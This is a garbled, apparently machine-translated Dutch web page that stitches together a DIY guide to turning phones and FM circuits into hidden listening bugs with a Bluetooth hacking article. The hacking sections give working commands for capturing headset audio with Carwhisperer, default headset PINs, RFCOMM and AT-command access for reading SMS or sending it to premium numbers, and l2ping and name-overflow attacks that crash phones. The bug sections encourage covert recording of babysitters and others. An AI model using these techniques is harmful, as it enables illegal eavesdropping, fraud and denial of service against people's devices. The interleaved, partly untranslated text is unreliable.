Handige tips

Hoe maak je een bug met je eigen handen: diagram en gedetailleerde beschrijving

Pin
Send
Share
Send
Send


Als het nodig is om naar een gesprek aan de telefoon te luisteren, is het helemaal niet nodig om een ​​bug in uw zak te steken of een luisterapparaat aan te sluiten. Alleen de mobiele telefoon van een slachtoffer is voldoende.

Op het juiste moment kiest uw telefoon een bepaald nummer op zichzelf en onmerkbaar, en een geïnteresseerde aanvaller kan naar uw gesprek luisteren totdat hij ophangt.

En als de mobiele telefoon in uw buurt is, kunt u er zeker van zijn dat het gesprek niet alleen wordt gehoord, maar ook wordt opgenomen. En de afstand van u tot de plaats van aftappen doet er niet toe.

Trouwens, in de telefoon, in uitgaande gesprekken, is er geen spoor van het "linker" gesprek, en je zult niet in staat zijn om erachter te komen dat je bent afgeluisterd. Moeilijk te geloven? Helaas, dit is zo. Hoewel niet alle mobiele telefoons door oplichters kunnen worden gebruikt als aftappen.

Er is een deel van de consumenten dat liever zakelijke smartphones gebruikt. Dit type apparaat onderscheidt zich door zijn brede mogelijkheden en aantrekkelijk ontwerp, maar tegelijkertijd heeft deze smartphone ook veel kwetsbaarheden. Met behulp van deze kwetsbaarheden kan een geïnteresseerde een telefoontap maken die door hem wordt bestuurd vanaf uw smartphone, en u weet er niets van.

En zelfs als een aanvaller zich aan de andere kant van de wereld bevindt, kan hij een oproep initialiseren om naar uw mobiele telefoon te luisteren. En het stelen van de telefoon van het 'slachtoffer' om de 'bug' te installeren, is helemaal niet nodig - bij sommige telefoonmerken kunt u ze op afstand bellen zonder op een knop op het apparaat te drukken en zelfs (!) Zonder het nummer te weten.

Juridische gronden

Natuurlijk moet u begrijpen dat speciale apparatuur om te luisteren het voorrecht is van de speciale services. In geval van schending van de grondwettelijke rechten van het individu en bewezen schuld in de schending van het geheim van het privéleven, zal administratieve straf volgen. Er zijn veel gevallen waarin het gaat om strafrechtelijke aansprakelijkheid. Maak daarom geen misbruik van het vervaardigde product. Het is veel verstandiger om een ​​dergelijk apparaat als een extra beveiligingsmiddel te gebruiken of het te gebruiken om akoestische controle over het grondgebied van uw eigen huis uit te oefenen. Een zelfgemaakte bug voor aftappen wordt bijvoorbeeld een uitstekende 'informant' als u niet zeker bent van het fatsoen van de oppas die u hebt ingehuurd of wilt weten wat er in de klas gebeurt. Ja, je kent nooit de situaties in het leven waarin het gebruik van luisterapparaten een noodzaak wordt.

Artikel inhoud

Iedereen weet dat met Bluetooth U kunt een bestand van apparaat naar apparaat overbrengen of een draadloze headset aansluiten. Maar dit is niet beperkt tot zijn mogelijkheden. Als je het juiste gereedschap bij je hebt, kun je echte wonderen doen. Dus waarom probeer je jezelf niet als een goochelaar?

Ingebouwde technologiemodule Bluetooth (of, formeler, IEEE 802.15.3) is al lang geen nieuwsgierigheid meer. De kosten van de module zijn zo schaars dat het niet is ingebouwd in een mobiel, laptop of PDA door een luie fabrikant. En zelfs dat - om marketingredenen. In een woord Bluetooth gebruik bijna alles. Maar slechts enkelen weten dat ze met behulp van technologie het risico lopen hun vertrouwelijke gegevens te verstrekken. Maar laten we beginnen met het goede!

Mobiele GSM-bug: een ongelooflijk eenvoudige oplossing

Om een ​​luisterapparaat van een mobiele telefoon te maken, hebt u een apparaat nodig dat de functie "Auto Pick-up" ondersteunt, u hebt ook een headset (koptelefoon) nodig. Het Nokia 1280-apparaat kan voor dergelijke doeleinden als het meest acceptabel worden beschouwd, omdat de eenvoud en betrouwbaarheid van de telefoon op het succes van het lopende project kan rekenen. Overigens is het zwart-wit scherm een ​​teken van winstgevendheid, het energieverbruik van het apparaat is aanzienlijk verminderd. Geloof me, zo'n bug uit de telefoon, afgestemd met je eigen handen, is een uitstekende vervanging voor dure luisterapparatuur. Bovendien, om eenvoudige acties uit te voeren die hieronder worden beschreven, kan letterlijk iedereen het doen. Laten we beginnen.

  • Ga naar het telefoonmenu en ga naar het gedeelte "Oproepmodus".
  • Maak je eigen persoonlijke modus. Alle items met betrekking tot de lichtindicatie, trilling, volume van de signaalmelodie, screensaver, geluidsbegeleiding voor het indrukken van knoppen en melding van een inkomend SMS-bericht moeten worden gedeactiveerd.
  • Geef een naam voor de nieuwe modus.
  • Zoek via het hoofdmenu het gedeelte "Accessoires instellen", dat meestal twee subitems "headset" en "gehoorapparaat" heeft. In elk van hen is het noodzakelijk om de operationele parameters te bewerken en de vraag hoe een bug te maken zal praktisch worden opgelost.
  • Alle "accessoire" -items moeten worden opgenomen. Zet de nieuw gecreëerde modus actief en verlaat de instellingen.
  • Snijd het snoer van de hoofdtelefoon af en steek de stekker in de hoofdtelefoonaansluiting.
  • Het display moet de geactiveerde modus weergeven.

Truc 1: BT gebruiken om op afstand toegang te krijgen tot een computer

Op de een of andere manier nodigde ik voor een presentatie een langbenige vriendin uit - druk op de spatiebalk om door de dia's in Power Point te bladeren. Dit plezier kostte me een dure lunch en twee uur lang praten met Barbie-meid. Daarna besloot ik beslist: de volgende keer zal ik het probleem van het ontbreken van een afstandsbediening anders aanpakken. En hij liep rond met zijn mobiele telefoon! Ja, ja, direct vanaf de telefoon kun je door dia's bladeren, muziek bedienen - en God weet wat hij anders moet doen. Het belangrijkste is dat BT-modules op de mobiele telefoon en computer worden geïnstalleerd. U bespaart niet alleen geld en moeite, u ziet er ook onvergeeflijk modieus uit. Om zo'n truc te laten zien is in staat voor iedereen die zauzayet hulpprogramma
Bluetooth afstandsbediening
, nog niet zo lang geleden bijgewerkt naar versie 3.0. Hiermee kunt u uw computer bedienen vanaf het scherm van elke mobiele telefoon. Alles is heel eenvoudig. Een speciaal serverdeel wordt op de computer geïnstalleerd en een in Java geschreven clientprogramma wordt op de telefoon geïnstalleerd (MIDP 2.0 is vereist). Nadat u een eenvoudig schema hebt ingesteld, kunt u de muis en het toetsenbord van de computer op afstand bedienen. En nog belangrijker, u krijgt toegang tot het externe bureaublad. Real Remote Desktop direct vanaf het scherm van uw mobiele telefoon! Nou, met een langbenige vriendin kan tijd veel succesvoller worden besteed. Bluetooth afstandsbediening komen hier goed van pas: zetten
romantische muziek :).

We gebruiken de smartphone voor andere doeleinden

Wanneer u op zakenreis of vakantie gaat, kunt u een soort bewaker als het ware een mobiele "bewaker" thuis laten. En u hoeft niets te solderen, en de celbug is een herwerkte smartphone met uw eigen handen. Al het andere is gewoon primitief.

  • Bijna alle smartphones zijn uitgerust met de functie "Oproepen automatisch accepteren".
  • In relatief nieuwe cellulaire eenheden is energiebesparende modustechnologie geïmplementeerd. Daarom kunt u rekenen op 5-7 dagen werking van uw batterij als u rekening houdt met de duidelijk gezonde toestand van het apparaat.
  • Een variant is mogelijk wanneer de telefoon is aangesloten op de lader en een speciaal apparaat met een tijdrelais fungeert als intermediair tussen het stopcontact en de lader. Een uur per dag is een perfect acceptabele opstartmodus (gezien de hierboven beschreven situatie).
  • Schakel de geluidsmelding, lichtindicatie en trillingsmodus in de telefoon uit.
  • Een dergelijke actie als het installeren van een hoofdtelefoon in de hoofdtelefoonaansluiting is niet overbodig, omdat de geluidsachtergrond rond de beller een ongunstig signaal is dat de locatie van het spionage-apparaat zal bepalen.
  • Plaats het apparaat in het middelste gedeelte van de woonruimte. Vergeet niet: het apparaat moet niet op een opvallende plaats staan, maar ook een kledingkast is geen oplossing. Plaats de telefoon op de mezzanine of zet hem vast op de achterkant van de hangende foto.

Truc 2: Toegangscontrole met BT

Als je in een kamer werkt waar een tiental collega's bij je zitten, moest je waarschijnlijk je computer op slot doen als je naar een andere kamer ging. En wat? Heb geen tijd om weg te gaan, omdat iemand al op je harde snuffelt. De indeling is niet de meest aangename. Over het algemeen moet u de computer vergrendelen, de vraag is - hoe? U kunt de standaardfuncties van Windows gebruiken en tien keer per dag een lang wachtwoord invoeren. Of doe het prachtig met technologie Bluetooth. Alles is zo simpel als twee en twee. U gaat weg van de computer en deze wordt onmiddellijk geblokkeerd. Je komt terug - en Loka zoals het gebeurde! De enige voorwaarde: de module moet op zowel de computer als de mobiele telefoon zijn geïnstalleerd
Bluetoothen het programma is in het systeem geïnstalleerd LockItNow (je kunt zo'n programma gemakkelijk zelf schrijven, we hadden een heel artikel). Vrienden en collega's kunnen echter over telepathische mogelijkheden praten en vervolgens het geheim voor geld verkopen :). Trouwens, als je geen BT-module bij de hand hebt, kun je deze vervangen door een telefoon die de "blue tooth" ondersteunt (plug-in via de COM-poort).

Bug voor aftappen: doe het zelf vanuit "geïmproviseerde middelen"

In de regel worden oude telefoons niet weggegooid. Vind de lang vergeten 'elektronische kameraad', want het is van hem dat je een effectief geluidsopnameapparaat zult maken. Het is vermeldenswaard dat bijna elke telefoon kan worden omgezet in een luisterapparaat. Dimensies spelen echter een belangrijke rol in het "spionageleven". Daarom is het in een delicate kwestie als aftappen raadzaam om kleine telefoonmodellen te gebruiken.

Truc 3: we halen BT-verkeer uit de lucht

Meesterschap begint met begrip. Heeft u ooit de wens gehad om in het protocol te kijken en erachter te komen hoe gegevens via de "blue tooth" worden uitgewisseld? Luisteren naar Bluetooth-verkeer kan alleen "op zichzelf" worden uitgevoerd, dat wil zeggen, het onderschept het uitgaande en inkomende verkeer van het knooppunt waarop u de opdracht hebt gegeven. In dit opzicht is de zogenaamde Host Controller Interface (HCI), waarmee u toegang tot de zender krijgt, niet van klein belang. Het HCI-knooppunt maakt meestal verbinding met het stuurprogramma-knooppunt van het apparaat Bluetooth (inkomende stream) en naar het L2CAP-knooppunt (uitgaande stream). Windows-platform biedt standaard niet zo'n mogelijkheid. Er zijn echter externe ontwikkelaars uitgebracht
speciale stuurprogramma's die toestaan vertaal standaard dongle in sniffer. Van oudsher is werk indicatief. FTS4BT Draadloze Bluetooth-protocolanalysatorgek geld. Het product haalt het feit in dat het het nieuwe ondersteunt Bluetooth v2.0 + EDRop basis waarvan moderne apparaten werken en bovendien in staat is al het verkeer uit de lucht te decoderen, audio, applicatieprotocolgegevens en nog veel meer nauwkeurig te sorteren. Het is duidelijk dat voor duiken (en inderdaad) de meest relevante USB-dongles klasse 1 zijn, waarvan de straal honderd meter bereikt.

Algemeen stroomdiagram

  • Demonteer de telefoon.
  • Neem een ​​scherm en verwijder alle LED's (toetsenbordverlichting - laat er een over voor visuele controle).
  • Soldeer de aan / uit-knop.
  • Voer de installatie van het apparaat uit - "Bel automatische ontvangst", omdat de bug met uw "handen" de telefoon moet opnemen.
  • Vervang de microfoon door een meer gevoelige (electret).
  • Vergroot de antenne (gewoon koperdraad 15-20 cm).
  • Soldeer de batterij en bevestig deze bovenop het toetsenbord (elastiek, tape).
  • Controleer de prestaties.

De optocoupler in het diagram kan worden vervangen door een KT315-type transistor of Western-analogen C9018, C9014. In dit geval wordt de condensator verwijderd en wordt de weerstand ingesteld met een weerstandswaarde van 2,2 k.

Truc 4: direct met de BT-adapter werken

Lange tijd Bluetooth-stapels voor Windows boden dergelijke schamele kansendat programmeurs dit platform gewoon hebben omzeild. Dit verklaart dat de meeste programma's voor serieus plezier met een "blue tooth" zijn ontwikkeld voor het Niks-platform. We zullen enkele van de trucs op dit platform analyseren, namelijk FreeBSD (Ik herinner u eraan dat we op de schijf van het vorige nummer de nieuwste 7.0-versie van dit besturingssysteem hebben geüpload). Technologie zelf Bluetooth officieel begon het alleen te worden ondersteund vanuit het 5e filiaal op basis van het Netgraph-subsysteem. Ik ben blij dat de meeste USB-adapters compatibel zijn met het stuurprogramma ng_ubt (deze moet worden geïnstalleerd voordat het apparaat wordt aangesloten). Zullen we het proberen?

  1. We verbinden het apparaat: kldload ng_ubt
  2. Kopieer het stapel-laadscript naar een handige plek: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Kopieer het stapel-laadscript naar een handige plaats en voer het uit: sh /usr/local/etc/rc.bluetoots start ubt0

Nu wil ik u kennis laten maken met het hulpprogramma hccontrol. Dit is een van de hoofdprogramma's voor het werken met de BT-module. Zij is het die alle bewerkingen met betrekking tot de HCI-interface uitvoert en de volgende syntaxis heeft: hccontrol –n. Laten we de functionaliteit van ons apparaat controleren, de ether scannen op apparaten:

hccontrol –n ubt0hci-aanvraag

Als gevolg hiervan zal het hulpprogramma informatie weergeven over de gevonden apparaten, inclusief hun MAC-adressen. Opgemerkt moet worden dat elk van de Bluetooth-apparaten, of het nu een headset of een gewone telefoon is, vertegenwoordigt een bepaalde set services. De basislijst omvat: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point) . Om erachter te komen welke services een bepaald apparaat biedt, wordt een aanvraag gebruikt voor een speciaal SPD-protocol (Service Descovery Protocol). De SPD-server draait rechtstreeks op de hostmachine en is uitsluitend een informatiecomponent (beïnvloedt deze
onmogelijk). U kunt met behulp van het juiste hulpprogramma bepalen welke services de gevonden apparaten bieden:

# spdcontrol -een browse

Truc 5: vind verborgen apparaten

Dus hebben we de uitzending gescand en zelfs ontdekt welke services beschikbaar zijn op actieve apparaten. Maar hier is de vangst! Sommige apparaten geven hun aanwezigheid op geen enkele manier uit, omdat ze zich in de modus "Undiscoverable mode" bevinden en niet reageren op uitzendverzoeken. Door de instellingen van je telefoon weet je waarschijnlijk een vergelijkbare beveiligingsoptie. echter u kunt dergelijke apparaten nog steeds detecteren!

De meest bekende techniek om ze te detecteren is dom zoeken van MAC-adressen, dat wil zeggen sequentieel verzenden van verzoeken naar verschillende adressen binnen een bepaald bereik. Om dit te doen, moet u een heel eenvoudig hulpprogramma Redfang gebruiken, dat de laatste zes bytes van het apparaatadres doorloopt en dus verborgen apparaten detecteert.

Een andere optie is om te gebruiken passieve technieken: zet uw apparaat in de stand-bymodus en wijs een aantrekkelijke naam toe aan het netwerk:

hciconfig hci0 naam BT_YANDEX
hciconfig hci0 naar beneden
hciconfig hci0 omhoog
hcidump -V | grep bdaddr

Als gevolg hiervan worden alle binnenkomende verbindingen weergegeven, waaronder kameraden met verborgen identificatiegegevens.

Truc 6: Headset-gesprekken uit de lucht onderscheppen

Een van de belangrijkste bedreigingen van radiotechnologie is dat gegevens kunnen worden onderschept. Het eerste dat me te binnen schiet met betrekking tot Bluetooth is luister naar de gesprekken van mensen die de headset gebruiken. En vaak is dit echt! Op het hackerfestival Wat is dat? in Nederland hebben experts van de Trifinite-groep aangetoond hoe een laptop met Linux, een speciaal programma en een directionele antenne worden gebruikt luister naar wat de bestuurder via de Bluetooth-headset spreekt passerende auto. De groep heeft een programma ontwikkeld Auto fluisteraar ("The Automobile Whisperer"). De mogelijkheden van het programma zijn relatief klein: je kunt alleen luisteren naar degenen die vergeten zijn de fabriekswachtwoorden voor Bluetooth-toegang te wijzigen
"0000" of "1234". Maar geloof me, er zijn veel van zulke arme kerels! "Sheptun" kan het "koppelen" van apparaten vastzetten en met succes doorgeven en informatie ontvangen die van de karkit of headset naar de mobiele telefoon is verzonden. Ik wil opletten: met dit hulpprogramma kunt u niet alleen de informatie tussen de headset en de mobiel doorgeven, maar ook uw eigen informatie daar injecteren. We hebben besloten om de mogelijkheden van dit programma te testen door te downloaden Auto fluisteraar van de ontwikkelaarssite.

Voordat u de bewerking start, wordt aanbevolen om de klasse van uw apparaat te wijzigen, vooral als het programma vanaf een computer wordt gebruikt:

hciconfig-adapterklasse 0x500204
# 0x500204 is de klasse "telefoon"

Anders kunnen sommige 'slimme' apparaten vermoeden dat er iets mis was. We kijken naar de syntaxis van het hulpprogramma, die er als volgt uitziet:

./carwhisperer "wat we insluiten in de regel" "wat we vastleggen van de regel" "apparaatadres" [kanaal]

We hebben het ingesloten bestand rechtstreeks uit de map van het hulpprogramma gehaald en out.raw was de uitvoer:

./carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73

De uitvoer is het bestand out.raw. Je kunt er niet puur naar luisteren: je moet het converteren naar een audioformaat, waarvoor een extra hulpprogramma vereist is. Heel wat audioconverters zullen bijvoorbeeld SoX doen:

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wav

Naast luisteren, kunt u zich aanmelden, het telefoonboek bekijken en profiteren van andere "handsfree" functies met Bluetooth. Het principe is dit: eerst worden de actieve apparaten gezocht en gecontroleerd op de HS (Head Set) -service. Vervolgens wordt het MAC-adres van het apparaat onderzocht en wordt geprobeerd verbinding te maken met een standaardsleutel. Als de verbinding tot stand is gebracht, kunt u met het apparaat alles doen wat u wilt (binnen de beschikbare set AT-opdrachten).

In de praktijk is dit als volgt. Eerst wordt er gezocht naar alle actieve headsets met behulp van de opdracht "sdptool search HS", die zoiets weergeeft:

Inquiring.
Zoeken naar HS op 00: 0A: 3A: 54: 71: 95.
Servicenaam: Headset
Service RecHandle: 0x10009
Serviceklasse ID lijst:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE. ) - pin="5475"
Audi UHV (00:0E:9F. ) - pin="1234"
O'Neill (00:80:37. ) - pin="8761"
Cellink (00:0A:94. ) - pin="1234"
Eazix (00:0C:84. ) - pin="1234"

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам. При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Truc 7: DDoS BT-apparaten

De aanpak is traditioneel. DDoS is echt mogelijk wanneer het hostapparaat ("master") vele malen superieur aan de client werkt. Deze situatie wordt een Denial Of Service-aanval genoemd. Het kan de telefoon ophangen of ervoor zorgen dat de batterij snel leeg raakt. Er zijn verschillende manieren om een ​​aanval uit te voeren. Laten we beginnen met standaardtools. Het meest voor de hand liggende is om het apparaat met grote pakketten te pingen. Dit kan worden gedaan door de vlag l2ping op te geven als parameter "-s":

# l2ping -s 10000 -b "MAC-adres"

Het programma zelf is, zoals u al begrepen hebt, een familielid van ping in een Bluetooth-omgeving en dient om de verbinding en de aanwezigheid van een verbinding te controleren. Een andere methode, die fundamenteel verschilt van de eerste, is om de "fuzzing" -techniek te gebruiken - een soort loterijtechniek, omdat van tevoren niet bekend is wat er zal gebeuren. Dit is een nieuwe trend in het identificeren van kwetsbaarheden in producten zonder broncode-analyse. De techniek vertrouwt alleen op interactieve communicatie met het object in een voor hem begrijpelijke taal, maar met absoluut chaotische argumenten en variabele waarden. De hacker-taak zal zijn om de zichtbare naam van de telefoon uit een voldoende groot aantal elementen te laten bestaan. Bij detectie door zijn "master" in 70%
In geval van overloop of denial of service:

hciconfig hci0 naam `perl -e 'print" ash "x 3137' '
# Team voor Linux
hccontrol –n adapter change_local_name “nieuwe naam”)
# voorbeeld voor FreeBSD

Veel telefoons kunnen nog steeds geen bombestanden verwerken. Hier is een eenvoudige implementatie van deze techniek.

  1. Bereid eerst de 'bom' voor. Bekend voorbeeld:
    echo `perl -e 'print" skvz "x 3137' '> bestand
  2. Vervolgens gebruiken ze een aangepast hulpprogramma voor interactie met OBEX - USSP PUSH (xmailserver.org/ussp-push.html)
    ./obextool push-bestand 00: 0A: 3A: 54: 71: 95 `perl -e 'print" skvz "x 3137' '3


Volledig artikel
lees in het aprilnummer van de Hacker!
Op onze schijf vindt u de volledige versies van de programma's die in het artikel worden beschreven, evenals een volledige selectie van Bluetooth-documentatie en kwetsbaarheden in deze technologie.

Is het mogelijk om te verdedigen tegen aanvallen van indringers

Is het mogelijk om het gesprek op een mobiele telefoon te beluisteren. Helaas is er geen kwaliteitsbescherming. Tegelijkertijd moet worden opgemerkt dat niet alle telefoons door dit beveiligingslek worden getroffen - voor sommige modellen moet de headset worden geverifieerd.

Een optie is om een ​​patch toe te passen die zo'n "gat" in de firmware van de telefoon sluit.

En tijdens een belangrijk vertrouwelijk gesprek moet de telefoon worden uitgeschakeld. Beter nog, gebruik aftaponderdrukkers.

Teamleider technische ondersteuningZakharov Vladimir

Miniatuur bug

Met je eigen handen kun je een FM-zender maken. Met een redelijk eenvoudig circuit kunt u een signaal ontvangen in het radiofrequentiegebied 88-92 MHz. Je moet niet meteen naar de winkel rennen en onderdelen kopen, misschien heb je defecte elektrische apparatuur, van het bord waarvan je de benodigde componenten kunt demonteren.

  • Bipolaire transistor - 2N3904 of analoog.
  • Weerstanden - 4,7 en 330 kOhm.
  • Condensatoren - 4,7 pF, 1 en 22 nF.
  • 30 pF trimmer condensator.
  • Contourspoel - wikkeldiameter 6 mm, acht-draai, draad 0,5 mm.
  • Het materiaal voor het bord is folie van glasvezel.
  • Batterijtype "Krona" bij 9 watt.
  • Electret-microfoon (de meest gevoelige wordt gebruikt in bandrecorders).

Een FM-bug in de aftakking plaatsen

  • Eerst wordt de afstemcondensator gesoldeerd (het midden van het bord). De transistor is links gemonteerd.
  • We gaan naar de onderkant en installeren (van links naar rechts) condensatoren: de eerste - 4,7 pF, de tweede - 1 nF.
  • Soldeer nu de weerstanden.
  • Na - een 22 nF condensator en een frameloze spoel.
  • De draadantenne, microfooninstallatie en batterijsolderen maken het ontwerp compleet.

Tot slot

Het is nu geen geheim voor u hoe u een bug in uw telefoon kunt maken en wat hiervoor nodig is. De opties voor GSM- en radioproducten die in dit informatieoverzicht worden gepresenteerd, zijn slechts een deel van de vele beschikbare elektronische voorbeelden waarmee u een hoogwaardige akoestische regeling kunt instellen. Desalniettemin moet worden opgemerkt dat praktische en kwaliteit worden bereikt door de bovengenoemde aanbevelingen toe te passen. Misschien is er echter een 'vakman' die een rationelere manier zal bedenken om de uitstekende prestaties van zijn luisteruitvindingen te realiseren. In de tussentijd zullen we gebruiken wat we hebben. Luister aandachtig!

Bekijk de video: Software Testing Tutorials for Beginners (September 2021).

Pin
Send
Share
Send
Send